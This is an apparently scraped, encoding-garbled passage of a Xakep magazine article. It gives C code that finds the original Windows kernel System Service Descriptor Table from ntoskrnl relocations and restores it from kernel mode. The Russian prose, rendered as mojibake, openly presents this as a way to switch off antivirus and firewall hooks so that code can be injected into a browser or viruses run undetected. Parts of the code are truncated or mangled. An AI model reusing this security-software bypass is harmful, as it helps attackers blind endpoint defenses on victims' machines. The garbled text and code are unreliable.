áúðчðть - Xakep Online
áúðчðть - Xakep Online
áúðчðть - Xakep Online
You also want an ePaper? Increase the reach of your titles
YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.
i,dwPointerRva,dwPointsToRva,dwKiServiceTable;<br />
BOOL bFirstChunk;<br />
GetHeaders((PCHAR)hModule,&pfh,&poh,&psh);<br />
if ((poh-><br />
DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress)<br />
&& (!((pfh->Characteristics)&IMAGE_FILE_RELOCS_STRIPPED))) {<br />
pbr=(PIMAGE_BASE_RELOCATION)RVATOVA(poh-><br />
DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress,<br />
hModule);<br />
bFirstChunk=TRUE;<br />
while (bFirstChunk || pbr->VirtualAddress) {<br />
bFirstChunk=FALSE;<br />
pfe=(PIMAGE_FIXUP_ENTRY)((DWORD)pbr +<br />
sizeof(IMAGE_BASE_RELOCATION));<br />
for (i=0;iSizeOfBlock -<br />
sizeof(IMAGE_BASE_RELOCATION))>>1;i++,pfe++)<br />
{<br />
if (pfe->type==IMAGE_REL_BASED_HIGHLOW) {<br />
dwFixups++;<br />
dwPointerRva=pbr->VirtualAddress+pfe->offset;<br />
dwPointsToRva=*(PDWORD)((DWORD)hModule +<br />
dwPointerRva)-(DWORD)poh->ImageBase;<br />
if (dwPointsToRva==dwKSDT)<br />
{<br />
if (*(PWORD)((DWORD)hModule+dwPointerRva-2)==0x05c7)<br />
{<br />
dwKiServiceTable=*(PDWORD)((DWORD)hModule +<br />
dwPointerRva+4) - poh->ImageBase;<br />
return dwKiServiceTable;<br />
}<br />
}<br />
}<br />
}<br />
*(PDWORD)&pbr += pbr->SizeOfBlock;<br />
}<br />
}<br />
return 0;<br />
}<br />
Ïîëó÷èâ ñìåùåíèå SDT, ìû ïðèáàâëÿåì åãî ê áàçå íàøåé êîïèè ÿäðà —<br />
ýòî è áóäåò àäðåñ îðèãèíàëüíîé òàáëèöû. Íà âñÿêèé ñëó÷àé êîïèðóåì<br />
âñå ñîäåðæèìîå SDT â ñîáñòâåííûé ìàññèâ DWORD è ðàäóåìñÿ —<br />
îñíîâíîå äåëî ñäåëàíî, îðèãèíàë ïîëó÷åí.<br />
GetHeaders((PCHAR)hKernel,&pfh,&poh,&psh);<br />
pService = (PDWORD)((DWORD)hKernel + dwKiServiceTable);<br />
for (pService=(PDWORD)((DWORD)hKernel+dwKiServiceTable);<br />
*pService-poh->ImageBaseSizeOfImage;<br />
pService++,dwServices++)<br />
TABLE[dwServices] = *pService — poh->ImageBase+dwKernelBase;<br />
NEWTABLE = (DWORD)(dwKernelBase + dwKSDT);<br />
Òåïåðü, ïåðåéäÿ â kernel mode, ìîæíî ëèáî âîññòàíîâèòü SDT, ïðîñòî<br />
çàìåíÿÿ âñå àäðåñà â òåêóùåé òàáëèöå íà àäðåñà, òîëüêî ÷òî ïîëó÷åííûå,<br />
÷òîáû óáèòü âñå çàùèòû, ëèáî èñïîëüçîâàòü ýòè ñàìûå àäðåñà íàïðÿìóþ,<br />
÷òîáû îáîéòè ïåðåõâàò. Â ïëàíå îáõîäà NtWriteVirtualmemory<br />
âîññòàíîâèòü ïðîùå, èñïîëüçîâàòü àäðåñà íàïðÿìóþ ìåíåå ïàëåâíî.<br />
Íàïðÿìóþ — çíà÷èò çàïóñêàòü ôóíêöèþ ïî ïîëó÷åííîìó àäðåñó ïðÿìèêîì<br />
èç ring0.<br />
Êîðî÷å, äàâàé îòêëþ÷èì âñå çàùèòû.<br />
[âîññòàíàâëèâàåì SDT íà óðîâíå ÿäðà]<br />
void InKerneProc()<br />
{<br />
for (int i = 0; i < dwServices; i++)<br />
((DWORD*)(*(DWORD*)(NEWTABLE)))[i] = TABLE[i];<br />
}<br />
Çàïóñòè ýòó ôóíêöèþ íà óðîâíå ÿäðà. Õî÷åøü — èíæåêòèðóé êîä â áðàóçåð,<br />
÷òîáû îáîéòè ôàéðâîë — íèêòî òåáå íè÷åãî íå ñêàæåò. Õî÷åøü —<br />
âèðóñû çàïóñêàé. Â îáùåì, âñå çàùèòû çàñûïàþò. Íåïëîõî, äà È ýòî<br />
âåäü åùå íå âñå ïðèìåíåíèå àíòèõóêèíãà íà óðîâíå ÿäðà. Ñ åãî æå ïîìîùüþ<br />
ìîæíî áîðîòüñÿ ñ êðóòûìè ÿäðåíûìè ðóòêèòàìè. Ìîæíî îòðóáàòü<br />
êàêèå-íèáóäü õèòðûå àíòèîòëàäî÷íûå ïðèåìû.  îáùåì, ïðèìåíåíèå,<br />
ïîìèìî áàíàëüíîãî îòðóáàíèÿ çàùèò, òû íàéäåøü.<br />
Ïîëíûé èñõîäíûé êîä ïðîãðàììû, îòðóáàþùåé âñå çàùèòû è îáõîäÿùåé<br />
ôàéðâîëû, òû ìîæåøü íàéòè íà äèñêå, î÷åíü ñîâåòóþ òåáå â íåì<br />
êàê ñëåäóåò ïîêîïàòüñÿ.<br />
Íà ýòîì ÿ çàêàí÷èâàþ ñâîå ïîâåñòâîâàíèå. Åñëè âîçíèêëè êàêèåíèáóäü<br />
âîïðîñû — ïèøè, ïîñòàðàþñü âñå îáúÿñíèòü. Óäà÷íîãî<br />
êîìïèëèðîâàíèÿ<br />
[XÀÊÅÐ 09 [81] 05 > ÊÎÄÈÍÃ 126]<br />
VICE çàñåêàåò ïåðåõâàòû Àíòèâèðóñà Êàñïåðñêîãî<br />
îáõîä ôàéðâîëà - ýòî äåëî 9 Êá êîäà
Change language